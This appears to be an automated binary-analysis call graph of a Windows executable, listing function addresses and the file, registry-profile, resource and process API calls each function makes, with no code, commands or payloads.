40aebe FindClose 39292->39293 39293->39286 39293->39287 39293->39290 39293->39291 39293->39292 39294 40a8d0 7 API calls 39293->39294 39294->39293 39296 409d1f 6 API calls 39295->39296 39297 404190 39296->39297 39310 409b98 GetFileAttributesW 39297->39310 39299 40419c 39300 4041a7 6 API calls 39299->39300 39301 40435c 39299->39301 39302 40424f 39300->39302 39301->38718 39302->39301 39304 40425e memset 39302->39304 39306 409d1f 6 API calls 39302->39306 39307 40a8ab 9 API calls 39302->39307 39311 414842 39302->39311 39304->39302 39305 404296 wcscpy 39304->39305 39305->39302 39306->39302 39308 4042b6 memset memset _snwprintf wcscpy 39307->39308 39308->39302 39309->38716 39310->39299 39314 41443e 39311->39314 39313 414866 39313->39302 39315 41444b 39314->39315 39316 414451 39315->39316 39317 4144a3 GetPrivateProfileStringW 39315->39317 39318 414491 39316->39318 39319 414455 wcschr 39316->39319 39317->39313 39321 414495 WritePrivateProfileStringW 39318->39321 39319->39318 39320 414463 _snwprintf 39319->39320 39320->39321 39321->39313 39322->38722 39324 40b2cc 27 API calls 39323->39324 39325 409615 39324->39325 39326 409d1f 6 API calls 39325->39326 39327 409625 39326->39327 39350 409b98 GetFileAttributesW 39327->39350 39329 409634 39332 409648 39329->39332 39367 4091b8 238 API calls 39329->39367 39331 40b2cc 27 API calls 39333 40965d 39331->39333 39332->39331 39334 408801 39332->39334 39335 409d1f 6 API calls 39333->39335 39334->38725 39334->38757 39336 40966d 39335->39336 39351 409b98 GetFileAttributesW 39336->39351 39338 40967c 39338->39334 39352 409529 39338->39352 39350->39329 39351->39338 39368 4096c3 CreateFileW 39352->39368 39354 409543 39355 4095cd 39354->39355 39356 409550 GetFileSize 39354->39356 39355->39334 39357 409577 CloseHandle 39356->39357 39358 40955f 39356->39358 39357->39355 39363 409585 39357->39363 39359 40afcf 2 API calls 39358->39359 39363->39355 39364 4095c3 39363->39364 39370 408b8d 38 API calls 39363->39370 39367->39332 39368->39354 39370->39363 39399 413f4f 39372->39399 39375 413f37 K32GetModuleFileNameExW 39376 413f4a 39375->39376 39376->38786 39378 413969 wcscpy 39377->39378 39379 41396c wcschr 39377->39379 39391 413a3a 39378->39391 39379->39378 39381 41398e 39379->39381 39403 4097f7 wcslen wcslen _memicmp 39381->39403 39383 41399a 39384 4139a4 memset 39383->39384 39385 4139e6 39383->39385 39404 409dd5 GetWindowsDirectoryW wcscpy 39384->39404 39387 413a31 wcscpy 39385->39387 39388 4139ec memset 39385->39388 39387->39391 39405 409dd5 GetWindowsDirectoryW wcscpy 39388->39405 39389 4139c9 wcscpy wcscat 39389->39391 39391->38786 39392 413a11 memcpy wcscat 39392->39391 39394 413cb0 GetModuleHandleW 39393->39394 39395 413cda 39393->39395 39394->39395 39396 413cbf 39394->39396 39397 413ce3 GetProcessTimes 39395->39397 39398 413cf6 39395->39398 39396->39395 39397->38788 39398->38788 39400 413f54 39399->39400 39402 413f2f 39399->39402 39401 40a804 8 API calls 39400->39401 39401->39402 39402->39375 39402->39376 39403->39383 39404->39389 39405->39392 39406->38808 39407->38831 39409 409cf9 GetVersionExW 39408->39409 39410 409d0a 39408->39410 39409->39410 39410->38838 39410->38842 39411->38845 39412->38848 39413->38850 39414->38895 39416 40bba5 39415->39416 39550 40cc26 39416->39550 39419 40bd4b 39571 40cc0c 39419->39571 39424 40b2cc 27 API calls 39425 40bbef 39424->39425 39578 40ccf0 _wcsicmp 39425->39578 39427 40bbf5 39427->39419 39579 40ccb4 6 API calls 39427->39579 39429 40bc26 39430 40cf04 17 API calls 39429->39430 39431 40bc2e 39430->39431 39432 40bd43 39431->39432 39433 40b2cc 27 API calls 39431->39433 39434 40cc0c 4 API calls 39432->39434 39435 40bc40 39433->39435 39434->39419 39580 40ccf0 _wcsicmp 39435->39580 39437 40bc61 memset memset WideCharToMultiByte 39581 40103c strlen 39437->39581 39438 40bc46 39438->39432 39438->39437 39440 40bcc0 39441 40b273 27 API calls 39440->39441 39442 40bcd0 memcmp 39441->39442 39442->39432 39443 40bce2 39442->39443 39444 404423 37 API calls 39443->39444 39445 40bd10 39444->39445 39445->39432 39446 40bd3a LocalFree 39445->39446 39447 40bd1f memcpy 39445->39447 39446->39432 39447->39446 39448->38910 39450 4438b5 11 API calls 39449->39450 39451 44444c 39450->39451 39452 40b879 39451->39452 39641 415a6d 39451->39641 39452->38913 39452->38914 39454 4442e6 11 API calls 39456 44469e 39454->39456 39455 444486 39457 4444b9 memcpy 39455->39457 39494 4444a4 39455->39494 39456->39452 39459 443d90 110 API calls 39456->39459 39645 415258 39457->39645 39459->39452 39460 444524 39461 444541 39460->39461 39462 44452a 39460->39462 39648 444316 39461->39648 39463 416935 16 API calls 39462->39463 39463->39494 39466 444316 18 API calls 39467 444563 39466->39467 39468 444316 18 API calls 39467->39468 39469 44456f 39468->39469 39470 444316 18 API calls 39469->39470 39471 44457f 39470->39471 39471->39494 39662 432d4e 39471->39662 39474 444316 18 API calls 39475 4445b0 39474->39475 39666 41eed2 39475->39666 39477 4445cf 39478 4445d6 39477->39478 39479 4445ee 39477->39479 39482 416935 16 API calls 39478->39482 39682 43302c 39479->39682 39482->39494 39494->39454 39777 438460 39495->39777 39497 40b8a4 39497->38920 39521 4251c4 39497->39521 39499 443da3 39498->39499 39517 443db6 39498->39517 39865 41707a 11 API calls 39499->39865 39501 443da8 39502 443dbc 39501->39502 39503 443dac 39501->39503 39867 4300e8 memset memset memcpy 39502->39867 39866 4446ea 11 API calls 39503->39866 39506 443de0 39507 416935 16 API calls 39506->39507 39507->39517 39508 443dce 39508->39506 39512 443e22 39508->39512 39509 443e5a 39869 4300e8 memset memset memcpy 39509->39869 39512->39509 39868 41f0ac 102 API calls 39512->39868 39513 443e63 39514 416935 16 API calls 39513->39514 39515 443f3b 39514->39515 39515->39517 39870 42320f memset memcpy 39515->39870 39517->38913 39519 409a74 GetTempFileNameW 39518->39519 39520 409a66 GetWindowsDirectoryW 39518->39520 39519->38907 39520->39519 39871 424f07 39521->39871 39523 4251e4 39524 4251f7 39523->39524 39525 4251e8 39523->39525 39879 4250f8 39524->39879 39878 4446ea 11 API calls 39525->39878 39527 4251f2 39527->38945 39529 425209 39531 425249 39529->39531 39535 4250f8 126 API calls 39529->39535 39536 425287 39529->39536 39887 4384e9 134 API calls 39529->39887 39888 424f74 123 API calls 39529->39888 39530 415c7d 16 API calls 39530->39527 39531->39536 39889 424ff0 13 API calls 39531->39889 39535->39529 39536->39530 39537 425266 39537->39536 39890 415be9 memcpy 39537->39890 39539->38945 39540->38945 39541->38945 39542->38945 39543->38945 39544->38945 39545->38945 39546->38945 39547->38945 39548->38920 39549->38942 39582 4096c3 CreateFileW 39550->39582 39552 40cc34 39553 40cc3d GetFileSize 39552->39553 39554 40bbca 39552->39554 39555 40afcf 2 API calls 39553->39555 39554->39419 39562 40cf04 39554->39562 39556 40cc64 39555->39556 39583 40a2ef ReadFile 39556->39583 39558 40cc71 39584 40ab4a MultiByteToWideChar 39558->39584 39560 40cc95 CloseHandle 39561 40b04b ??3@YAXPAX 39560->39561 39561->39554 39563 40b633 ??3@YAXPAX 39562->39563 39564 40cf14 39563->39564 39590 40b1ab ??3@YAXPAX ??3@YAXPAX 39564->39590 39566 40bbdd 39566->39419 39566->39424 39567 40cf1b 39567->39566 39569 40cfef 39567->39569 39591 40cd4b 39567->39591 39570 40cd4b 14 API calls 39569->39570 39570->39566 39572 40b633 ??3@YAXPAX 39571->39572 39573 40cc15 39572->39573 39574 40aa04 ??3@YAXPAX 39573->39574 39575 40cc1d 39574->39575 39640 40b1ab ??3@YAXPAX ??3@YAXPAX 39575->39640 39577 40b7d4 memset CreateFileW 39577->38900 39577->38901 39578->39427 39579->39429 39580->39438 39581->39440 39582->39552 39583->39558 39585 40ab93 39584->39585 39586 40ab6b 39584->39586 39585->39560 39587 40a9ce 4 API calls 39586->39587 39588 40ab74 39587->39588 39589 40ab7c MultiByteToWideChar 39588->39589 39589->39585 39590->39567 39592 40cd7b 39591->39592 39625 40aa29 39592->39625 39594 40cef5 39595 40aa04 ??3@YAXPAX 39594->39595 39596 40cefd 39595->39596 39596->39567 39598 40aa29 6 API calls 39599 40ce1d 39598->39599 39600 40aa29 6 API calls 39599->39600 39601 40ce3e 39600->39601 39602 40ce6a 39601->39602 39633 40abb7 wcslen memmove 39601->39633 39603 40ce9f 39602->39603 39636 40abb7 wcslen memmove 39602->39636 39606 40a8d0 7 API calls 39603->39606 39609 40ceb5 39606->39609 39607 40ce56 39634 40aa71 wcslen 39607->39634 39608 40ce8b 39637 40aa71 wcslen 39608->39637 39615 40a8d0 7 API calls 39609->39615 39612 40ce5e 39635 40abb7 wcslen memmove 39612->39635 39613 40ce93 39638 40abb7 wcslen memmove 39613->39638 39617 40cecb 39615->39617 39639 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39617->39639 39619 40cedd 39620 40aa04 ??3@YAXPAX 39619->39620 39621 40cee5 39620->39621 39622 40aa04 ??3@YAXPAX 39621->39622 39623 40ceed 39622->39623 39624 40aa04 ??3@YAXPAX 39623->39624 39624->39594 39626 40aa33 39625->39626 39627 40aa63 39625->39627 39628 40aa44 39626->39628 39629 40aa38 wcslen 39626->39629 39627->39594 39627->39598 39630 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 39628->39630 39629->39628 39631 40aa4d 39630->39631 39631->39627 39632 40aa51 memcpy 39631->39632 39632->39627 39633->39607 39634->39612 39635->39602 39636->39608 39637->39613 39638->39603 39639->39619 39640->39577 39642 415a77 39641->39642 39643 415a8d 39642->39643 39644 415a7e memset 39642->39644 39643->39455 39644->39643 39646 4438b5 11 API calls 39645->39646 39647 41525d 39646->39647 39647->39460 39649 444328 39648->39649 39650 444423 39649->39650 39651 44434e 39649->39651 39715 4446ea 11 API calls 39650->39715 39652 432d4e 3 API calls 39651->39652 39654 44435a 39652->39654 39656 444375 39654->39656 39661 44438b 39654->39661 39655 432d4e 3 API calls 39657 4443ec 39655->39657 39658 416935 16 API calls 39656->39658 39659 444381 39657->39659 39660 416935 16 API calls 39657->39660 39658->39659 39659->39466 39660->39659 39661->39655 39663 432d65 39662->39663 39664 432d58 39662->39664 39663->39474 39716 432cc4 memset memset memcpy 39664->39716 39667 41eee2 39666->39667 39668 415a6d memset 39667->39668 39669 41ef23 39668->39669 39670 415a6d memset 39669->39670 39681 41ef2d 39669->39681 39671 41ef42 39670->39671 39675 41ef49 39671->39675 39717 41b7d9 39671->39717 39673 41ef66 39674 41ef74 memset 39673->39674 39673->39675 39675->39681 39732 41b321 100 API calls 39675->39732 39681->39477 39683 433033 39682->39683 39684 433042 39682->39684 39738 421f20 memset 39683->39738 39739 415a91 39684->39739 39687 43303f 39715->39659 39716->39663 39723 41b812 39717->39723 39718 415a6d memset 39719 41b8c2 39718->39719 39726 41b849 39719->39726 39723->39726 39730 41b884 39723->39730 39733 444706 11 API calls 39723->39733 39726->39673 39730->39718 39730->39726 39732->39681 39733->39730 39738->39687 39740 415a9d 39739->39740 39789 41703f 39777->39789 39779 43847a 39780 43848a 39779->39780 39781 43847e 39779->39781 39796 438270 39780->39796 39826 4446ea 11 API calls 39781->39826 39786 4384bb 39787 438270 133 API calls 39786->39787 39788 438488 39787->39788 39788->39497 39790 417044 39789->39790 39791 41705c 39789->39791 39795 417055 39790->39795 39828 416760 11 API calls 39790->39828 39792 417075 39791->39792 39829 41707a 11 API calls 39791->39829 39792->39779 39795->39779 39797 415a91 memset 39796->39797 39798 43828d 39797->39798 39799 438297 39798->39799 39800 438341 39798->39800 39802 4382d6 39798->39802 39801 415c7d 16 API calls 39799->39801 39830 44358f 39800->39830 39804 438458 39801->39804 39805 4382fb 39802->39805 39806 4382db 39802->39806 39804->39788 39827 424f26 122 API calls 39804->39827 39861 415c23 memcpy 39805->39861 39807 416935 16 API calls 39806->39807 39809 4382e9 39807->39809 39811 415c7d 16 API calls 39809->39811 39810 438305 39813 44358f 19 API calls 39810->39813 39816 438318 39810->39816 39811->39799 39812 438373 39815 438383 39812->39815 39862 4300e8 memset memset memcpy 39812->39862 39813->39816 39819 4383cd 39815->39819 39863 415c23 memcpy 39815->39863 39816->39812 39856 43819e 39816->39856 39818 4383f5 39822 438404 39818->39822 39823 43841c 39818->39823 39819->39818 39864 42453e 122 API calls 39819->39864 39825 416935 16 API calls 39822->39825 39824 416935 16 API calls 39823->39824 39824->39799 39825->39799 39826->39788 39827->39786 39828->39795 39829->39790 39831 4435be 39830->39831 39833 443676 39831->39833 39836 4436ce 39831->39836 39839 442ff8 19 API calls 39831->39839 39840 44366c 39831->39840 39854 44360c 39831->39854 39832 443758 39835 441409 memset 39832->39835 39844 443775 39832->39844 39833->39832 39834 443737 39833->39834 39837 442ff8 19 API calls 39833->39837 39838 442ff8 19 API calls 39834->39838 39835->39832 39842 4165ff 11 API calls 39836->39842 39837->39834 39838->39832 39839->39831 39843 4169a7 11 API calls 39840->39843 39841 4437be 39845 416760 11 API calls 39841->39845 39846 4437de 39841->39846 39842->39833 39843->39833 39844->39841 39850 415c56 11 API calls 39844->39850 39845->39846 39847 42463b memset memcpy 39846->39847 39849 443801 39846->39849 39847->39849 39848 443826 39852 43bd08 memset 39848->39852 39849->39848 39851 43024d memset 39849->39851 39850->39841 39851->39848 39853 443837 39852->39853 39853->39854 39855 43024d memset 39853->39855 39854->39816 39855->39853 39857 438246 39856->39857 39859 4381ba 39856->39859 39857->39812 39858 41f432 109 API calls 39858->39859 39859->39857 39859->39858 39860 41f638 103 API calls 39859->39860 39860->39859 39861->39810 39862->39815 39863->39819 39864->39818 39865->39501 39866->39517 39867->39508 39868->39512 39869->39513 39870->39517 39872 424f1f 39871->39872 39873 424f0c 39871->39873 39892 424eea 11 API calls 39872->39892 39891 416760 11 API calls 39873->39891 39876 424f18 39876->39523 39877 424f24 39877->39523 39878->39527 39880 425108 39879->39880 39886 42510d 39879->39886 39925 424f74 123 API calls 39880->39925 39883 42516e 39885 415c7d 16 API calls 39883->39885 39884 425115 39884->39529 39885->39884 39886->39884 39893 42569b 39886->39893 39887->39529 39888->39529 39889->39537 39890->39536 39891->39876 39892->39877 39903 4256f1 39893->39903 39921 4259c2 39893->39921 39898 4260dd 39937 424251 119 API calls 39898->39937 39899 429a4d 39906 429a66 39899->39906 39907 429a9b 39899->39907 39903->39899 39904 422aeb memset memcpy memcpy 39903->39904 39909 4260a1 39903->39909 39918 4259da 39903->39918 39919 429ac1 39903->39919 39903->39921 39924 425a38 39903->39924 39926 4227f0 memset memcpy 39903->39926 39927 422b84 15 API calls 39903->39927 39928 422b5d memset memcpy memcpy 39903->39928 39929 422640 13 API calls 39903->39929 39931 4241fc 11 API calls 39903->39931 39932 42413a 89 API calls 39903->39932 39904->39903 39938 415c56 11 API calls 39906->39938 39908 429a96 39907->39908 39940 416760 11 API calls 39907->39940 39941 424251 119 API calls 39908->39941 39935 415c56 11 API calls 39909->39935 39911 429a7a 39939 416760 11 API calls 39911->39939 39936 416760 11 API calls 39918->39936 39920 425ad6 39919->39920 39942 415c56 11 API calls 39919->39942 39920->39883 39921->39920 39930 415c56 11 API calls 39921->39930 39924->39921 39933 422640 13 API calls 39924->39933 39934 4226e0 12 API calls 39924->39934 39925->39886 39926->39903 39927->39903 39928->39903 39929->39903 39930->39918 39931->39903 39932->39903 39933->39924 39934->39924 39935->39918 39936->39898 39937->39920 39938->39911 39939->39908 39940->39908 39941->39919 39942->39918 39943->38980 39944->38988 39954 44def7 39955 44df07 39954->39955 39956 44df00 ??3@YAXPAX 39954->39956 39957 44df17 39955->39957 39958 44df10 ??3@YAXPAX 39955->39958 39956->39955 39959 44df27 39957->39959 39960 44df20 ??3@YAXPAX 39957->39960 39958->39957 39961 44df37 39959->39961 39962 44df30 ??3@YAXPAX 39959->39962 39960->39959 39962->39961 37719 44dea5 37720 44deb5 FreeLibrary 37719->37720 37721 44dec3 37719->37721 37720->37721 39963 4148b6 FindResourceW 39964 4148f9 39963->39964 39965 4148cf SizeofResource 39963->39965 39965->39964 39966 4148e0 LoadResource 39965->39966 39966->39964 39967 4148ee LockResource 39966->39967 39967->39964 37898 415304 ??3@YAXPAX 39968 441b3f 39978 43a9f6 39968->39978 39970 441b61 40151 4386af memset 39970->40151 39972 44189a 39973 4418e2 39972->39973 39975 442bd4 39972->39975 39974 4418ea 39973->39974 40152 4414a9 12 API calls 39973->40152 39975->39974 40153 441409 memset 39975->40153 39979 43aa20 39978->39979 39986 43aadf 39978->39986 39980 43aa34 memset 39979->39980 39979->39986 39981 43aa56 39980->39981 39982 43aa4d 39980->39982 40154 43a6e7 39981->40154 40162 42c02e memset 39982->40162 39986->39970 39988 43aad3 40164 4169a7 11 API calls 39988->40164 39989 43aaae 39989->39986 39989->39988 40004 43aae5 39989->40004 39990 43ac18 39993 43ac47 39990->39993 40166 42bbd5 memcpy memcpy memcpy memset memcpy 39990->40166 39994 43aca8 39993->39994 40167 438eed 16 API calls 39993->40167 39998 43acd5 39994->39998 40169 4233ae 11 API calls 39994->40169 39997 43ac87 40168 4233c5 16 API calls 39997->40168 40170 423426 11 API calls 39998->40170 40002 43ace1 40171 439811 162 API calls 40002->40171 40003 43a9f6 160 API calls 40003->40004 40004->39986 40004->39990 40004->40003 40165 439bbb 22 API calls 40004->40165 40006 43acfd 40011 43ad2c 40006->40011 40172 438eed 16 API calls 40006->40172 40008 43ad19 40173 4233c5 16 API calls 40008->40173 40010 43ad58 40174 44081d 162 API calls 40010->40174 40011->40010 40014 43add9 40011->40014 40014->40014 40178 423426 11 API calls 40014->40178 40015 43ae3a memset 40016 43ae73 40015->40016 40179 42e1c0 146 API calls 40016->40179 40017 43adab 40176 438c4e 162 API calls 40017->40176 40018 43ad6c 40018->39986 40018->40017 40175 42370b memset memcpy memset 40018->40175 40022 43adcc 40177 440f84 12 API calls 40022->40177 40023 43ae96 40180 42e1c0 146 API calls 40023->40180 40026 43aea8 40029 43aec1 40026->40029 40181 42e199 146 API calls 40026->40181 40028 43af00 40028->39986 40032 43af1a 40028->40032 40033 43b3d9 40028->40033 40029->40028 40182 42e1c0 146 API calls 40029->40182 40183 438eed 16 API calls 40032->40183 40038 43b3f6 40033->40038 40043 43b4c8 40033->40043 40034 43b60f 40034->39986 40242 4393a5 17 API calls 40034->40242 40037 43af2f 40184 4233c5 16 API calls 40037->40184 40224 432878 12 API calls 40038->40224 40040 43af51 40185 423426 11 API calls 40040->40185 40042 43b4f2 40231 43a76c 21 API calls 40042->40231 40043->40042 40230 42bbd5 memcpy memcpy memcpy memset memcpy 40043->40230 40045 43af7d 40186 423426 11 API calls 40045->40186 40049 43af94 40187 423330 11 API calls 40049->40187 40050 43b529 40232 44081d 162 API calls 40050->40232 40051 43b462 40226 423330 11 API calls 40051->40226 40055 43b544 40059 43b55c 40055->40059 40233 42c02e memset 40055->40233 40056 43b428 40056->40051 40225 432b60 16 API calls 40056->40225 40057 43afca 40188 423330 11 API calls 40057->40188 40058 43b47e 40061 43b497 40058->40061 40227 42374a memcpy memset memcpy memcpy memcpy 40058->40227 40234 43a87a 162 API calls 40059->40234 40228 4233ae 11 API calls 40061->40228 40064 43afdb 40189 4233ae 11 API calls 40064->40189 40067 43b4b1 40229 423399 11 API calls 40067->40229 40069 43b56c 40072 43b58a 40069->40072 40235 423330 11 API calls 40069->40235 40071 43afee 40190 44081d 162 API calls 40071->40190 40236 440f84 12 API calls 40072->40236 40073 43b4c1 40238 42db80 162 API calls 40073->40238 40078 43b592 40237 43a82f 16 API calls 40078->40237 40081 43b5b4 40239 438c4e 162 API calls 40081->40239 40083 43b5cf 40240 42c02e memset 40083->40240 40085 43b005 40085->39986 40091 43b01f 40085->40091 40191 42d836 162 API calls 40085->40191 40086 43add4 40086->40034 40241 438f86 16 API calls 40086->40241 40087 43b1ef 40201 4233c5 16 API calls 40087->40201 40089 43b212 40202 423330 11 API calls 40089->40202 40091->40087 40199 423330 11 API calls 40091->40199 40200 42d71d 162 API calls 40091->40200 40093 43b087 40192 4233ae 11 API calls 40093->40192 40096 43b22a 40203 42ccb5 11 API calls 40096->40203 40099 43b23f 40204 4233ae 11 API calls 40099->40204 40100 43b10f 40195 423330 11 API calls 40100->40195 40102 43b257 40205 4233ae 11 API calls 40102->40205 40106 43b129 40196 4233ae 11 API calls 40106->40196 40107 43b26e 40206 4233ae 11 API calls 40107->40206 40110 43b09a 40110->40100 40193 42cc15 19 API calls 40110->40193 40194 4233ae 11 API calls 40110->40194 40112 43b282 40207 43a87a 162 API calls 40112->40207 40113 43b13c 40197 440f84 12 API calls 40113->40197 40115 43b29d 40208 423330 11 API calls 40115->40208 40118 43b15f 40198 4233ae 11 API calls 40118->40198 40119 43b2af 40121 43b2b8 40119->40121 40122 43b2ce 40119->40122 40209 4233ae 11 API calls 40121->40209 40210 440f84 12 API calls 40122->40210 40125 43b2c9 40212 4233ae 11 API calls 40125->40212 40126 43b2da 40211 42370b memset memcpy memset 40126->40211 40129 43b2f9 40213 423330 11 API calls 40129->40213 40131 43b30b 40214 423330 11 API calls 40131->40214 40133 43b325 40215 423399 11 API calls 40133->40215 40135 43b332 40216 4233ae 11 API calls 40135->40216 40137 43b354 40217 423399 11 API calls 40137->40217 40139 43b364 40218 43a82f 16 API calls 40139->40218 40141 43b370 40219 42db80 162 API calls 40141->40219 40143 43b380 40220 438c4e 162 API calls 40143->40220 40145 43b39e 40221 423399 11 API calls 40145->40221 40147 43b3ae 40222 43a76c 21 API calls 40147->40222 40149 43b3c3 40223 423399 11 API calls 40149->40223 40151->39972 40152->39974 40153->39975 40155 43a6f5 40154->40155 40161 43a765 40154->40161 40155->40161 40243 42a115 40155->40243 40159 43a73d 40160 42a115 146 API calls 40159->40160 40159->40161 40160->40161 40161->39986 40163 4397fd memset 40161->40163 40162->39981 40163->39989 40164->39986 40165->40004 40166->39993 40167->39997 40168->39994 40169->39998 40170->40002 40171->40006 40172->40008 40173->40011 40174->40018 40175->40017 40176->40022 40177->40086 40178->40015 40179->40023 40180->40026 40181->40029 40182->40029 40183->40037 40184->40040 40185->40045 40186->40049 40187->40057 40188->40064 40189->40071 40190->40085 40191->40093 40192->40110 40193->40110 40194->40110 40195->40106 40196->40113 40197->40118 40198->40091 40199->40091 40200->40091 40201->40089 40202->40096 40203->40099 40204->40102 40205->40107 40206->40112 40207->40115 40208->40119 40209->40125 40210->40126 40211->40125 40212->40129 40213->40131 40214->40133 40215->40135 40216->40137 40217->40139 40218->40141 40219->40143 40220->40145 40221->40147 40222->40149 40223->40086 40224->40056 40225->40051 40226->40058 40227->40061 40228->40067 40229->40073 40230->40042 40231->40050 40232->40055 40233->40059 40234->40069 40235->40072 40236->40078 40237->40073 40238->40081 40239->40083 40240->40086 40241->40034 40242->39986 40244 42a175 40243->40244 40246 42a122 40243->40246 40244->40161 40249 42b13b 146 API calls 40244->40249 40246->40244 40247 42a115 146 API calls 40246->40247 40250 43a174 40246->40250 40274 42a0a8 146 API calls 40246->40274 40247->40246 40249->40159 40264 43a196 40250->40264 40265 43a19e 40250->40265 40251 43a306 40251->40264 40290 4388c4 14 API calls 40251->40290 40254 42a115 146 API calls 40254->40265 40255 415a91 memset 40255->40265 40256 43a642 40256->40264 40294 4169a7 11 API calls 40256->40294 40260 43a635 40293 42c02e memset 40260->40293 40264->40246 40265->40251 40265->40254 40265->40255 40265->40264 40275 42ff8c 40265->40275 40283 4165ff 40265->40283 40286 439504 13 API calls 40265->40286 40287 4312d0 146 API calls 40265->40287 40288 42be4c memcpy memcpy memcpy memset memcpy 40265->40288 40289 43a121 11 API calls 40265->40289 40266 43a325 40266->40256 40266->40260 40266->40264 40268 42bf4c 14 API calls 40266->40268 40269 4169a7 11 API calls 40266->40269 40270 42b5b5 memset memcpy 40266->40270 40273 4165ff 11 API calls 40266->40273 40291 42b63e 14 API calls 40266->40291 40292 42bfcf memcpy 40266->40292 40268->40266 40269->40266 40270->40266 40273->40266 40274->40246 40295 43817e 40275->40295 40277 42ff99 40278 42ffe3 40277->40278 40279 42ffd0 40277->40279 40282 42ff9d 40277->40282 40300 4169a7 11 API calls 40278->40300 40299 4169a7 11 API calls 40279->40299 40282->40265 40284 4165a0 11 API calls 40283->40284 40285 41660d 40284->40285 40285->40265 40286->40265 40287->40265 40288->40265 40289->40265 40290->40266 40291->40266 40292->40266 40293->40256 40294->40264 40296 438187 40295->40296 40297 438192 40295->40297 40301 4380f6 40296->40301 40297->40277 40299->40282 40300->40282 40303 43811f 40301->40303 40302 438164 40302->40297 40303->40302 40306 437e5e 40303->40306 40329 4300e8 memset memset memcpy 40303->40329 40330 437d3c 40306->40330 40308 437ea9 40314 437eb3 40308->40314 40315 437f22 40308->40315 40345 41f432 40308->40345 40311 437f06 40392 415c56 11 API calls 40311->40392 40313 437f95 40393 415c56 11 API calls 40313->40393 40314->40303 40316 437f7f 40315->40316 40317 432d4e 3 API calls 40315->40317 40316->40313 40318 43802b 40316->40318 40317->40316 40320 4165ff 11 API calls 40318->40320 40321 438054 40320->40321 40356 437371 40321->40356 40324 43806b 40325 438094 40324->40325 40394 42f50e 137 API calls 40324->40394 40326 437fa3 40325->40326 40395 4300e8 memset memset memcpy 40325->40395 40326->40314 40396 41f638 103 API calls 40326->40396 40329->40303 40331 437d80 40330->40331 40332 437d69 40330->40332 40334 437d76 40331->40334 40335 437da3 40331->40335 40338 437d90 40331->40338 40397 437ccb 11 API calls 40332->40397 40334->40308 40337 438460 133 API calls 40335->40337 40341 437dcb 40337->40341 40338->40334 40401 437ccb 11 API calls 40338->40401 40339 437de8 40400 424f26 122 API calls 40339->40400 40341->40339 40398 444283 13 API calls 40341->40398 40343 437dfc 40399 437ccb 11 API calls 40343->40399 40346 41f54d 40345->40346 40352 41f44f 40345->40352 40347 41f466 40346->40347 40431 41c635 memset memset 40346->40431 40347->40311 40347->40315 40352->40347 40354 41f50b 40352->40354 40402 41f1a5 40352->40402 40427 41c06f memcmp 40352->40427 40428 41f3b1 89 API calls 40352->40428 40429 41f398 85 API calls 40352->40429 40354->40346 40354->40347 40430 41c295 85 API calls 40354->40430 40357 41703f 11 API calls 40356->40357 40358 437399 40357->40358 40359 43739d 40358->40359 40362 4373ac 40358->40362 40432 4446ea 11 API calls 40359->40432 40361 4373a7 40361->40324 40363 416935 16 API calls 40362->40363 40364 4373ca 40363->40364 40365 438460 133 API calls 40364->40365 40370 4251c4 136 API calls 40364->40370 40374 415a91 memset 40364->40374 40377 43758f 40364->40377 40389 437584 40364->40389 40391 437d3c 134 API calls 40364->40391 40433 425433 13 API calls 40364->40433 40434 425413 17 API calls 40364->40434 40435 42533e 16 API calls 40364->40435 40436 42538f 16 API calls 40364->40436 40437 42453e 122 API calls 40364->40437 40365->40364 40366 4375bc 40368 415c7d 16 API calls 40366->40368 40369 4375d2 40368->40369 40369->40361 40371 4442e6 11 API calls 40369->40371 40370->40364 40372 4375e2 40371->40372 40372->40361 40440 444283 13 API calls 40372->40440 40374->40364 40438 42453e 122 API calls 40377->40438 40380 4375f4 40383 437620 40380->40383 40384 43760b 40380->40384 40382 43759f 40385 416935 16 API calls 40382->40385 40387 416935 16 API calls 40383->40387 40441 444283 13 API calls 40384->40441 40385->40389 40387->40361 40389->40366 40439 42453e 122 API calls 40389->40439 40390 437612 memcpy 40390->40361 40391->40364 40392->40314 40393->40326 40394->40325 40395->40326 40396->40314 40397->40334 40398->40343 40399->40339 40400->40334 40401->40334 40403 41bc3b 100 API calls 40402->40403 40404 41f1b4 40403->40404 40405 41edad 85 API calls 40404->40405 40412 41f282 40404->40412 40406 41f1cb 40405->40406 40407 41f1f5 memcmp 40406->40407 40408 41f20e 40406->40408 40406->40412 40407->40408 40409 41f21b memcmp 40408->40409 40408->40412 40410 41f326 40409->40410 40413 41f23d 40409->40413 40411 41ee6b 85 API calls 40410->40411 40410->40412 40411->40412 40412->40352 40413->40410 40414 41f28e memcmp 40413->40414 40416 41c8df 55 API calls 40413->40416 40414->40410 40415 41f2a9 40414->40415 40415->40410 40418 41f308 40415->40418 40419 41f2d8 40415->40419 40417 41f269 40416->40417 40417->40410 40420 41f287 40417->40420 40421 41f27a 40417->40421 40418->40410 40425 4446ce 11 API calls 40418->40425 40422 41ee6b 85 API calls 40419->40422 40420->40414 40423 41ee6b 85 API calls 40421->40423 40424 41f2e0 40422->40424 40423->40412 40426 41b1ca memset 40424->40426 40425->40410 40426->40412 40427->40352 40428->40352 40429->40352 40430->40346 40431->40347 40432->40361 40433->40364 40434->40364 40435->40364 40436->40364 40437->40364 40438->40382 40439->40366 40440->40380 40441->40390 40442 41493c EnumResourceNamesW 37723 4287c1 37724 4287d2 37723->37724 37725 429ac1 37723->37725 37726 428818 37724->37726 37727 42881f 37724->37727 37741 425711 37724->37741 37738 425ad6 37725->37738 37793 415c56 11 API calls 37725->37793 37760 42013a 37726->37760 37788 420244 96 API calls 37727->37788 37731 4260dd 37787 424251 119 API calls 37731->37787 37735 4259da 37786 416760 11 API calls 37735->37786 37737 429a4d 37744 429a66 37737->37744 37745 429a9b 37737->37745 37741->37725 37741->37735 37741->37737 37742 422aeb memset memcpy memcpy 37741->37742 37747 4260a1 37741->37747 37756 4259c2 37741->37756 37759 425a38 37741->37759 37776 4227f0 memset memcpy 37741->37776 37777 422b84 15 API calls 37741->37777 37778 422b5d memset memcpy memcpy 37741->37778 37779 422640 13 API calls 37741->37779 37781 4241fc 11 API calls 37741->37781 37782 42413a 89 API calls 37741->37782 37742->37741 37789 415c56 11 API calls 37744->37789 37746 429a96 37745->37746 37791 416760 11 API calls 37745->37791 37792 424251 119 API calls 37746->37792 37785 415c56 11 API calls 37747->37785 37749 429a7a 37790 416760 11 API calls 37749->37790 37756->37738 37780 415c56 11 API calls 37756->37780 37759->37756 37783 422640 13 API calls 